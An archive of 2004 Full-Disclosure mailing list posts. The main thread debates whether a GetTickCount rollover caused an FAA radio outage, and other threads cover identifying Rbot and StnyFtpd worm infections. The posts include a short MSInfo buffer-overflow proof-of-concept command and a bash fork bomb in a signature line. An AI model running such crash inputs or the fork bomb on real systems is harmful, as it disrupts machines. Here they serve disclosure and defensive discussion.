are you speaking for m$? Of course not, but I don't have the legal liability they have either and my dev staff is the staff of one so I can get to the people in the know rather quicker than MS. Plus I don't have to be politically correct and be nice about it. you know that not able to comment basically means screwed ? It does? I could think it means they talked to press people and they didn't want to just talk, they wanted to wait for someone who knew code could look into the issue. If the press person just quickly responded, someone would beat them for that as well. There are a lot of people out there that just like to beat on MS regardless of what is said. joe -Original Message- From: Georgi Guninski [mailto:[EMAIL PROTECTED] Sent: Friday, September 24, 2004 10:47 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, Sep 24, 2004 at 09:28:08AM -0400, joe wrote: Nod. Some knucklehead used GetTickCount or clock() for their app and had no clue about datatypes and overflows and range of possible values and some people go off on Windows. joo, are you speaking for m$? the article clearly states: Microsoft told Techworld it was aware of the reports but was not immediately able to comment. you know that not able to comment basically means screwed ? -- where do you want bill gates to go today? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
From the article The servers are timed to shut down after 49.7 days of use in order to prevent a data overload, a union official told the LA Times. To avoid this automatic shutdown, technicians are required to restart the system manually every 30 days. An improperly trained employee failed to reset the system, leading it to shut down without warning, the official said. And Soon after installation, however, the FAA discovered that the system design could lead to a radio system shutdown, and put the maintenance procedure into place as a workaround, the LA Times said. The FAA reportedly said it has been working on a permanent fix but has only eliminated the problem in Seattle. The FAA is now planning to institute a second workaround - an alert that will warn controllers well before the software shuts down. It would appear that the VSCS shut down, not the system. Further it would appear that someone failed to reboot the system and caused this, not that the system hung or died mid-restart. This article combined with other discussions makes it sound like the app itself had issue, the system didn't crash or drop. Kernel memory wasn't corrupted etc. The fact that they want it rebooted and the time frame mentioned, 49.7 days which happens to coincide perfectly with when the 32 bit DWORD output from GetTickCount has to roll over to 0, means they are probably basing some timing info off the output of GetTickCount and can't properly handle the rollover. GetTickCount is based off system start date. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sysinfo/bas e/gettickcount.asp Options are to have a thread managing your own timer values based on some floating point type or 64 bit integer or 64 bit high resolution timers (all of which just moves the problem further out and are all available right now and have been for some time) or properly handle the datatype used. A popular option which is even worse is to base things off the system clock. While you don't have to worry about a rollover for a long long time with Windows FILETIME (64 bit) and epoch if using ctime, at that point then you start getting all sorts of timing issues due to time correction software or the user changing the time. Anyway, had they used high resolution timers (QueryPerformanceCounter/QueryPerformanceFrequency) instead of GetTickCount they would have been working with an API available since like NT3.1/Win9x and would have been using 64 bit INTs and if I recall correctly wouldn't have had an issue until the system had been up for something like 100 years (200 if using unsigned) which obviously could NEVER happen with a Windows system. Been a while since I worked out the details of those functions. Anyway, many coders avoid them because they don't like working with 64 bit INTs. joe -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Friday, September 24, 2004 10:15 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 joe wrote: Where issues like this relate to the OS is in the fact that the OS itself shouldn't be brought down by a poorly designed app. Of course, you can shoot yourself in the foot in any OS, but an overflow in a local app should never take down the kernel. Unfortunately, memory management in MS Windows (though it's gotten better over time) is still not up to par and that is what causes a number of these issues. Not to mention poor system architecture and design on the part of MS. Was it MS Windows that actually held the code that brought the system down? Well, that depends on how far down you want to drill and where you place the burden of OS stability. If you place it on the OS, then Windows is fair game. If you place the burden of OS stability on the app, then you're foolish and don't understand OS design concepts. :) (said in jest, but then, so is most truth) The article doesn't make the situation entirely clear. Did the app intentionally restart the system and foul it? Did the restart occur because the app crashed? I'm skeptical because technical details like this are usually confused, mislabeled, or misreported... even (especially?) in tech rags. So, who holds the burden in this case depends on the answers to the questions above. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
I agree you should be able to rely on the products. What is apparently at fault here is a vendor using a value from a system function incorrectly or if you wish, using an incorrect system function for their purpose. I'm pretty confident they weren't rebooting these servers for Windows to function, it was a matter of the resetting the tick count for the application. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Friday, September 24, 2004 11:01 AM To: Barry Fitzgerald Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, 2004-09-24 at 09:15, Barry Fitzgerald wrote: The article doesn't make the situation entirely clear. Did the app intentionally restart the system and foul it? Did the restart occur because the app crashed? No, no, the problem was human error because a tech didn't reboot the system. It's clearly operator error, not a problem with any systems at all. Unfortunately, there is some truth in this. We (and not just the media) are starting to put blame on humans far too quickly. Is this justified? On one hand, they are only tools for us to do our job. On the other hand, they are products that we should be able to rely on. Who do we blame? Operators or products? Cheers. Frank ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
I read that article differently than you. It seems you read it that a system backup (i.e. something backing up data) failed. I read that an operator didn't reboot the system and the software designed to catch that and handle it failed. An improperly trained employee failed to reset the system, leading it to shut down without warning, the official said. Backup systems failed because of a software failure, Note Backup systemS. I.E. Operator was first line of defense, an automated system was the backup and it didn't fire. Probably due to failure to test it. The article implied (though didn't outright state it) that the Unix systems did not include regular reboots. That is stretching I think what they wrote, but it is probably accurate though several large companies I know do UNIX reboots every Sunday maint window right along with Windows reboots. Anyway, what your statement of implication implies to me is the vendor knew how to code UNIX apps and didn't know how to code Windows apps. I think you are absolutely incorrect on why the reboot was needed. It wasn't to clear memory, it was to reset the system counter so that gettickcount doesn't overflow the DWORD. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Friday, September 24, 2004 11:15 AM To: Frank Knobbe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 Frank Knobbe wrote: On Fri, 2004-09-24 at 09:15, Barry Fitzgerald wrote: The article doesn't make the situation entirely clear. Did the app intentionally restart the system and foul it? Did the restart occur because the app crashed? No, no, the problem was human error because a tech didn't reboot the system. It's clearly operator error, not a problem with any systems at all. I disagree - if the system were engineered properly, a reboot would not be necessary to keep the system from falling on it's face. The article implied (though didn't outright state it) that the Unix systems did not include regular reboots. I don't know enough about the engineering of the system to state whether this was caused by the app, the OS, or some dependancy issue. But, in a critical system of this nature, relying on scheduled reboots for operation sends a signal to me that there's a problem in the system. Unfortunately, there is some truth in this. We (and not just the media) are starting to put blame on humans far too quickly. Is this justified? On one hand, they are only tools for us to do our job. On the other hand, they are products that we should be able to rely on. Who do we blame? Operators or products? That depends on the situation. If a system can be engineered to operate properly on it's own, then it should be. All else is operator error. I think it most depends on the rationality of the automated requirement. If the backup fails because said user forgets to change the backup tapes, then the problem is human error. If the backup fails because said product doesn't properly flush its buffers and sends all data to /dev/null, then the issue is software error, even if it's a known condition that has had procedure put in place to work around it. The argument for automation is rational and supposed to be in the system, and thus it's an error in the engineering. The second scenario is similar to what we had here. All a reboot does is ensure that the memory has been cleared. If their developers don't know how to do this in code, or if they choose OS' that can't reliably do this, then either fire the developers and/or the decision makers, because they didn't do their jobs and people could have died because of that. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
There were actually worse foul ups from poor developers using that function. And I agree, the ones who did it weren't too intelligent or informed on what they were dealing with. Doesn't mean that windows is a product of stupid developers but parts of it could certainly be pointed at as an argument for it. :o) joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Friday, September 24, 2004 10:09 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, 2004-09-24 at 06:21, ASB wrote: That has nothing to do with Windows, and everything to do with a stupid application. ...as if stupid app developers are solely the products of Windows environments. No. But according to that logic it seems that Windows is a product of stupid developers. http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com: 80/support/kb/articles/q216/6/41.aspNoWebContent=1 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
It says right in the article they were running Windows 2000 Advanced Server. The systems were not impacted by the Win95 hang bug. Almost certainly Windows was fine... period. The communication software puked based on the same API function that the Windows 95 Dev guys screwed up with. The value rolls over and either the application software detects that and shuts down the application or the application crashes because of poor exception handling. If Windows crashed of its own accord, then yes, MS needs to share some blame. If, what actually happened is a crappy app died and the OS was fine the whole time, the responsibility rests with the application vendor and the design/implementation team. Should technicians be rebooting boxes as fixes. Absolutely not. However, before assuming it is an OS issue, understand why they are rebooting it. In this case I expect it was to reset the tick count for the application itself. If it is because the app is eating all the memory up, that is one hellacious memory leak they need to work on in the app. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michal Zalewski Sent: Friday, September 24, 2004 2:32 PM To: ASB Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 On Fri, 24 Sep 2004, ASB wrote: The servers are timed to shut down after 49.7 days of use in order to prevent a data overload, a union official told the LA Times. How you managed to read OS failure into this is rather astounding... The statement above, even though either cleverly disguised by the authorities, or mangled by the press, does ring a bell. It is not about applications eating up too much memory, hence requiring an occassional reboot, oh no. Windows 9x had a problem (fixed by Microsoft, by the way) that caused them to hang or crash after a jiffie counter in the kernel overflowed: http://support.microsoft.com/support/kb/articles/q216/6/41.asp It would happen precisely after 49.7 days. Coincidence? Not very likely. It seems that the system was running on unpatched Windows 95 or 98, and rather than deploying a patch, they came up with a maintenance procedure requiring a scheduled reboot every 30 days. This is one hell of a ridiculous idea, and any attempt to blame a failure on a technician who failed to reboot the box is really pushing it. It is not uncommon for telecommunications, medical, flight control, banking and other mission-critical applications to run on terribly ancient software (and with a clause that requires them NOT to be updated, because the software is not certified against those patches). In the end, the OS and decision-makers that implemented the system and established ill-conceived workarounds should split the blame. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
You certainly like to assume. MS being aware doesn't mean they are involved. Even if they are, I suspect they will not go around saying that the vendor screwed up. They will simply help them with it. On a daily basis MS sends people into companies and corrects and troubleshoots things vendors did incorrectly. I have friends in MCS and that is pretty much all they do day in and day out, correct what partners and vendors made mistakes on in customer sites. The vendors/partners tend to be pissy about it but not quite as pissy if MS went around telling everyone publicly whose stuff they had to throw out and redo. On the MS puppet piece, you once again have no clue of what you speak. joe -Original Message- From: Georgi Guninski [mailto:[EMAIL PROTECTED] Sent: Friday, September 24, 2004 3:58 PM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 joo, i don't want to read shit written by m$ puppets. clearly m$ is involved in this incident according to the press. enough days passed since the incident (hahahahaha). where is the oficial m$ reply? -- where do you want bill gates to go today? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
C:\WINDOWS\system32find GetTickCount kernel32.dll -- KERNEL32.DLL GetTickCount Umm yeah. That would be the DLL that exports the function. :o) Anyway, even if it is used, if used with understanding of the data value range it can used safely. I have used it safely (as have many coders) many times in the past when manipulating 64 bit numbers associated with QueryPerformanceCounter would have been overkill. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bashis Sent: Friday, September 24, 2004 3:35 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 Hi list, Regarding GetTickCount() [1] it might be a good idea to schedule reboot of Windows boxes within 49.7 days, just in case.. Even M$ folks do misstakes [2] when they are using this function. Hm, i'm wonder what this is used for.. ? ;-) C:\WINDOWS\system32find GetTickCount kernel32.dll -- KERNEL32.DLL GetTickCount C:\WINDOWS\system32 Well, M$ never stop to suprise me.. ;-) Have a nice day /bashis [1] http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sysinfo/bas e/gettickcount.asp [2] http://support.microsoft.com/default.aspx?scid=kb;en-us;318152 http://support.microsoft.com/default.aspx?scid=kb;en-us;823273 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Other articles state that as
which replaced the original servers with off-the-shelf Dell hardware
running Microsoft Windows 2000 Advanced Server
Also there are other mentions of Windows Servers replacing UNIX servers.
Don't think I have ever met someone who would be willing to call Win9x a
server.
but it seems that the only valid approximation of what it could originally
mean is an OS problem.
It is a valid approximation of lots of apps that have problems with
GetTickCount including MS themselves. In the years of helping companies and
their vendors I have seen MANY occurrences of this problem. It is an
extremely common problem. The number one reason given by vendors when I
approach them on it is they weren't aware of another function to get a
timer. The second reason was that they were aware but didn't like working
with 64 bit integers which can be a pain in some compilers/languages.
- Why would they use such a ridiculous counter? Applications usually
do not have to count time on their own, and usually rely on RTC data.
Counting miliseconds seems futile, though I suppose it could be
just a matter of an obscure design.
There are valid uses for counters like this, usually for
sequencing/syncronization. I can't say anything other than you haven't had
experience with them. Granted many uses of handling time in an app this way
would be better served with an event driven timer or signals, but not all
coders are comfortable doing things like that. The non-hardware specific RTC
capability from windows is through the high resolution timers though even MS
doesn't call Windows (other than CE/Embedded) a RT OS. The next closest
approximation is through GetTickCount which is there to give an easy 32 bit
answer to things, again because many coders don't like 64 bit integers.
- Why wouldn't the same code fail on unix previously?
Who says it is the same code? The fact that it does fail at 49.7 days would
seem to indicate to me it isn't because they are using some different method
of doing the timing, not number of ms since start time in a 32 bit value.
- Why would they claim again and again that this was an OS feature?
Because the people speaking don't code and the vendor probably said so. I
heard the same thing out of a vendor a couple of years ago when a company
contacted me about a timer that would start counting down after the program
ran for many days. The vendor was screwing up in how they used clock() which
returns an unsigned long. They swore up and down it was MS's fault until I
wrote code and duplicated exactly what they were doing and had another
example side by side with it that worked perfectly. I just the other day
dealt in the newsgroups with another vendor who ran into the exact same
problem with clock(). The issue is no or incomplete understanding of basic
data types.
joe
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michal Zalewski
Sent: Friday, September 24, 2004 5:26 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
On Fri, 24 Sep 2004, joe wrote:
It says right in the article they were running Windows 2000 Advanced
Server.
The systems were not impacted by the Win95 hang bug. Almost certainly
Windows was fine... period.
Ahem... the most informative piece I could find reads:
http://www.latimes.com/news/local/la-me-faa16sep16,1,3729661.story
When the system was upgraded about a year ago, the original [unix]
computers were replaced by Dell computers using Microsoft software.
Baggett said the Microsoft software contained an internal clock
designed to shut the system down after 49.7 days to prevent it from
becoming overloaded with data.
This appears to be a fine example of a meaningless gibberish, but it seems
that the only valid approximation of what it could originally mean is an OS
problem. Which is consistent with what we know about old Microsoft OSes.
Sure, the same problem could happen if the application running on that box
used a 32-bit integer to store milisecond count since its launch - but:
- Why would they use such a ridiculous counter? Applications usually
do not have to count time on their own, and usually rely on RTC data.
Counting miliseconds seems futile, though I suppose it could be
just a matter of an obscure design.
- Why wouldn't the same code fail on unix previously?
- Why would they claim again and again that this was an OS feature?
It seems that all the claims support the OS flaw version, though of course
it's not a good idea to trust the press on technical issues.
Until we know more, getting into an off-topic, groundless flamewar is not
needed.
--
- bash$ :(){ :|:};: -- Michal Zalewski *
[http://lcamtuf.coredump.cx]
Did you know that clones never use mirrors?
--- 2004-09-24 23:08 --
http://lcamtuf.coredump.cx/photo/current
RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
Again, there are valid uses of GetTickCount and there are safe ways of doing so. If there is concern, I do recommend testing functionality associated with each of the DLLs. You might find a bug you can report for kudos. On the incident, I would guess the vendor never had a clue it would do that. That function can't return more than 49.7 days without breaking every app that currently uses it. MS can not do that. That is why there is another function to get the info with a different datatype. See my other posts. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bashis Sent: Friday, September 24, 2004 5:47 PM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 C:\WINDOWS\system32find GetTickCount kernel32.dll -- KERNEL32.DLL GetTickCount Umm yeah. That would be the DLL that exports the function. :o) Yes, perhaps, but do a search in \windows and \windows\system32 and you will find several program using (or exporting;) this function. ;-) Anyway, even if it is used, if used with understanding of the data value range it can used safely. I have used it safely (as have many coders) many times in the past when manipulating 64 bit numbers associated with QueryPerformanceCounter would have been overkill. Yes, offcores it can be used safely. My wild guess about that incident is that the programmer(s) who coded the application didn't get that it will wrap to zero after 49.7 days, and as workaround they told the customer to reboot their servers with the reason Windows, it's crappy.. you know.. We can argue about if the return is right or wrong from GetTickCount(), even if the function was well documented and the coders was missing the magic word 49.7 days, i realy don't care. But, my personally opinion is that a The return value is the number of milliseconds that have elapsed since the system was started. function should return more than 49.7 days, but hey.. M$ perhaps dont expect more uptime on their OS'es.. ;-) Well, i dont know if the GetTickCount() is the cause to the incident, it was only a notice when i was searching and reading about functions/bugs with the magic word 49.7 days ;-) I am glad that the incident was turned out w/o any human losses. Have a nice day /bashis ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] unknown backdoor: 220 StnyFtpd 0wns j0
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_KIBUV.BVSect=T Ryan Sumida wrote: I've been finding a few compromised Windows systems on our campus that have a random port open with a banner of 220 StnyFtpd 0wns j0. All the systems seem to be doing SYN scans on port 445 and LSASS buffer overflow attempts. Anyone know what worm/bot is doing this? I don't have access to these machines so I can only get a network view of what the systems are doing. Thanks, Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] unknown backdoor: 220 StnyFtpd 0wns j0
You can try scanning it if you have the file. http://virusscan.jotti.dhs.org Ryan Sumida wrote: Thank you all for the help, I definitily appreciate it. The last system I checked had ftp running on port 15708 which makes me believe it is not the WORM_KIBUV.B but a similar variant. Sorry for the unnecessary post, I googled the whole string which didn't come back with anything. I should have just googled StnyFtpd. Thanks again, Ryan [EMAIL PROTECTED] wrote on 09/23/2004 10:42:13 AM: I've been finding a few compromised Windows systems on our campus that have a random port open with a banner of 220 0wns j0. All the systems seem to be doing SYN scans on port 445 and LSASS buffer overflow attempts. Anyone know what worm/bot is doing this? I don't have access to these machines so I can only get a network view of what the systems are doing. Thanks, Ryan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
Unless for (a purely theretical) example the website would use your submission to infect others Right, that is what I'm concern about. I do not know the intension of virustotal.com, and their policy on binaries they received. The parent site (http://www.hispasec.com/) does not offer more information. I believe the intension maybe good but I have some lingering suspicion of *free* service that have you send in binary maybe the elaborate works of vx traders. (cue the conspiracy theories) Me submitting the virus to someone count as distributing the virus (according to the lawyers). I been warn by lawyers about such things. I should add that the lawyers have no problem if I submit the sample to AV company. Its more of a CYA than anything else. J Michel Messerschmidt wrote: On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote: hey if the binary is infected and does not contain any hardcoded sencitive info what do u care about the owners of the website ? Unless for (a purely theretical) example the website would use your submission to infect others (perhaps with your address as sender) :-) Although the binary may not contain any sensitive data, it is dangerous in itself because it is self-replicating and thus hard to control once it is activated. If your are not very cautious when handling self-replicating code, you most likely end up sending it out to the world. So for the question how to handle possibly dangerous code it all comes down to Who do you trust ? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe
On Thu, 2 Sep 2004 10:16:30 -0400, S.A. Birl wrote: Does anyone know how it infects? Primarily via the LSASS exploit over port 445, but variants have been seen with the following additional exploits/password brute-force spreading modules: WebDav Lsass135 Lsass1025 NetBios NTPass Dcom135 Dcom445 Dcom1025 MSSQL Beagle1 Beagle2 MyDoom Optix UPNP NetDevil DameWare Kuang2 Sub7 After the exploit, the bot is copied to the victim using the Windows tftp client. http://virusscan.jotti.dhs.org/ lists msrtwd.exe as backdoor.sdbot.gen Yes, some AV companies identify Rbot as SDbot, even though the two look almost nothing alike. It could be that Rbot was derived from SDbot, but it has grown substantially, and is almost on par with Agobot in terms of functionality. Because there are so many variants, each with a different exe name, it's sometimes hard to keep track of them. Just so it can be indexed for future reference, here is a list of Rbot exe names we've seen during exploit captures, and dates we've seen them spreading over the last 3 months: Dates Seen Exe Name - 2004/06/06 - 2004/06/27 lsrv.exe 2004/06/06 - 2004/08/28 wuapdate16.exe 2004/06/07 - 2004/06/15 sndcfg16.exe 2004/06/07 - 2004/08/30 wuamgrd.exe 2004/06/08 - 2004/06/27 lsac.exe 2004/06/10 - 2004/06/10 winupdos.exe 2004/06/10 - 2004/06/26 dosprmwin.exe 2004/06/11 - 2004/06/11 systemse.exe 2004/06/11 - 2004/08/18 scrgrd.exe 2004/06/13 - 2004/06/13 dude.exe 2004/06/14 - 2004/06/14 esplorer.exe 2004/06/14 - 2004/06/14 landriver32.exe 2004/06/14 - 2004/06/14 mpd.exe 2004/06/14 - 2004/06/14 updatez.exe 2004/06/14 - 2004/06/25 svssshost.exe 2004/06/14 - 2004/08/26 jacfg2.exe 2004/06/17 - 2004/06/26 wuammgr32.exe 2004/06/18 - 2004/06/18 svhost.exe 2004/06/18 - 2004/06/18 wuamgrd32.exe 2004/06/18 - 2004/06/23 wuamagrd.exe 2004/06/20 - 2004/06/20 wloader.exe 2004/06/21 - 2004/08/29 pidserv.exe 2004/06/22 - 2004/09/01 navscan32.exe 2004/06/23 - 2004/06/23 hpsysmon.exe 2004/06/24 - 2004/06/24 winipcfgs.exe 2004/06/24 - 2004/06/24 wwwstream.exe 2004/06/25 - 2004/06/25 lcsrv64.exe 2004/06/25 - 2004/06/25 srvhost.exe 2004/06/25 - 2004/06/25 systemnt.exe 2004/06/25 - 2004/06/25 win64.exe 2004/06/27 - 2004/06/27 win32apisrvr.exe 2004/08/16 - 2004/08/24 soundblaster.exe 2004/08/16 - 2004/08/25 msnmsg.exe 2004/08/16 - 2004/08/27 windowsup.exe 2004/08/16 - 2004/08/29 muamgrd.exe 2004/08/16 - 2004/08/30 winupdater.exe 2004/08/16 - 2004/08/31 win16update.exe 2004/08/16 - 2004/09/01 dllmngr32.exe 2004/08/17 - 2004/08/17 msdev.exe 2004/08/17 - 2004/08/17 svchostc.exe 2004/08/17 - 2004/08/31 javatm.exe 2004/08/17 - 2004/08/31 usbsvc.exe 2004/08/17 - 2004/09/01 msnmsgr.exe 2004/08/18 - 2004/08/18 mnzks.exe 2004/08/18 - 2004/08/18 notepad.exe 2004/08/18 - 2004/08/18 tcpip.exe 2004/08/19 - 2004/08/19 mss3rvices200x.exe 2004/08/19 - 2004/08/19 msservices200x.exe 2004/08/19 - 2004/09/01 iexplore.exe 2004/08/23 - 2004/08/23 msrtwd.exe 2004/08/24 - 2004/08/24 csass.exe 2004/08/24 - 2004/08/24 winxp32.exe 2004/08/24 - 2004/08/26 nmon.exe 2004/08/24 - 2004/08/27 winupdate.exe 2004/08/24 - 2004/09/01 msnplus.exe 2004/08/25 - 2004/08/25 lsas.exe 2004/08/25 - 2004/08/27 dwervdl32.exe 2004/08/26 - 2004/08/26 jutsu.exe 2004/08/26 - 2004/08/26 usb.exe 2004/08/26 - 2004/08/26 win43.exe 2004/08/27 - 2004/08/27 java.exe 2004/08/27 - 2004/08/27 svchost32.exe 2004/08/27 - 2004/08/29 iexplorer.exe 2004/08/27 - 2004/08/30 ati2vid.exe 2004/08/27 - 2004/08/30 svchosts.exe 2004/08/29 - 2004/08/29 server.exe 2004/08/29 - 2004/08/30 nortoanavap.exe 2004/08/29 - 2004/09/02 syswin32.exe 2004/08/30 - 2004/09/02 rsvc32.exe 2004/08/30 - 2004/09/02 vsmons.exe 2004/08/31 - 2004/08/31 winsrv.exe 2004/09/02 - 2004/09/02 sslwina.exe 2004/09/02 - 2004/09/02 winxpini.exe -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
Does anyone have more information about http://www.hispasec.com/; who runs virustotal. I don't feel comfortable sending binary to some company that I have no information about. J bashis wrote: Thx for the tip with VirusTotal guys! =) Here is the result. /bashis Forwarded message: From [EMAIL PROTECTED] Thu Sep 2 18:38:33 2004 Date: Thu, 2 Sep 2004 18:38:32 +0200 [snip] Virus Total ___ Scan results File: win2kup2date.exe Date: 09/02/2004 20:31:53 BitDefender 7.0/20040902found nothing ClamWin devel-20040822/20040901 found nothing eTrustAV-Inoc 4641/20040728 found nothing Kaspersky 4.0.2.24/20040902 found [Backdoor.Rbot.gen] McAfee 4389/20040901 found [W32/Sdbot.worm.gen.h] NOD32v2 1.858/20040901 found nothing Norman 5.70.10/20040902found nothing Panda 7.02.00/20040902found [W32/Gaobot.AKP.worm] Sybari 7.5.1314/20040902 found [Worm.RBot.HY] Symantec8.0/20040901found nothing TrendMicro 7.000/20040901 found nothing ___ VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about abailability and continuity of this service. Do not reply this message, it has been sent by an automated process that will not handle such responses. Even when the detection rate given by the use of multiple antivirus engines is far superior to the one offered by only one product, this results DO NOT guarantee the harmlessness of a file. There is no such a solution that can offer a 100% rate of efectiveness recognizing virus and malware. ___ Servidor Antivirus HispaSec Sistemas (c) Hispasec Sistemas, 1998-2004 http://www.hispasec.com --===51590098234082227==-- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe
On Wed, 1 Sep 2004 15:08:56, Scott Birl wrote: Recently discovered a trojan(? - possibly a virus) called msrtwd.exe. It's listed in the Registry as Microsoft Update Loader Does anyone know anything about this? Google doesnt offer much. We saw an Rbot variant spreading on August 23 with the same exe name. I've also seen other Rbot variants using a similar registry key name. Kaspersky does a pretty good job of spotting unknown Rbot variants with a generic signature Backdoor.Rbot.gen. -Joe -- Joe Stewart, GCIH Senior Security Researcher LURHQ http://www.lurhq.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Update Loader msrtwd.exe
You can run it through http://www.virustotal.com and if it catch anything. J S.A. Birl wrote: Hello all: Recently discovered a trojan(? - possibly a virus) called msrtwd.exe. It's listed in the Registry as Microsoft Update Loader Does anyone know anything about this? Google doesnt offer much. Thanks Scott Birl http://concept.temple.edu/sysadmin/ Senior Systems AdministratorComputer Services Temple University *******+******** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MSInfo Buffer Overflow
I think at best you could succeed in crashing the process or executing code in the context of the user running msinfo32. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of E.Kellinis Sent: Monday, August 30, 2004 11:17 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MSInfo Buffer Overflow SNIP Although in tests this bug wouldnt lead to dangerous situations.. I wouldnt bet 100% on that ! = Proof Of Concept Code = C:\Program Files\Common Files\Microsoft Shared\MSInfo msinfo32 /msinfo_file= AA AA AA AA AAA ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Update
Yes the update that caused the issue was a dat file update, not an engine update. I agree, I think our AV product line sucked. Actually many of us consistently said it was worse than the viruses it was trying to protect us from. I will let you guess the product, but it is a common one for large companies and starts with a Mc. You are correct in that it is the default, however I think as a whole that is the safer choice for the default. People who understand the system or even understand they have to do updates, will know or be able to figure out how to disable the automatic install and if they want the automatic download. If MS didn't set that default then the next time a worm or virus slid through that would have been stopped or slowed by a majority of the non-techie users having had their machines at autoupdate they would have taken a beating from this community for not having done so. I think you have to look at your user population in order to decide how you should implement different things. There may be an ideal world answer but if it doesn't address reality it isn't so good. Windows has an extremely large number of non-technical users and admins running around, more than any other OS. MS has to take that into account when doing things. If they didn't set that updates need to be auto-downloaded/installed how many (by percentage) Windows users/admins do you think would know to actually turn it on? How many knew to turn off IIS in the earlier Windows incarnations? I would be surprised to hear a number greater than 15-20% but I am taking a wild guess. The folks that don't want auto-updates are probably of the more technical realm so they shouldn't have tremendous issues disabling the updates. joe -Original Message- From: Über GuidoZ [mailto:[EMAIL PROTECTED] Sent: Tuesday, August 24, 2004 6:13 PM To: joe Cc: FD Subject: Re: [Full-Disclosure] Windows Update A very valid point Joe, thanks for briging it up. I DID say I only allow virus definition files to auto-update, not program updates. Are the definition file updates the ones causing the problems you speak of, or the 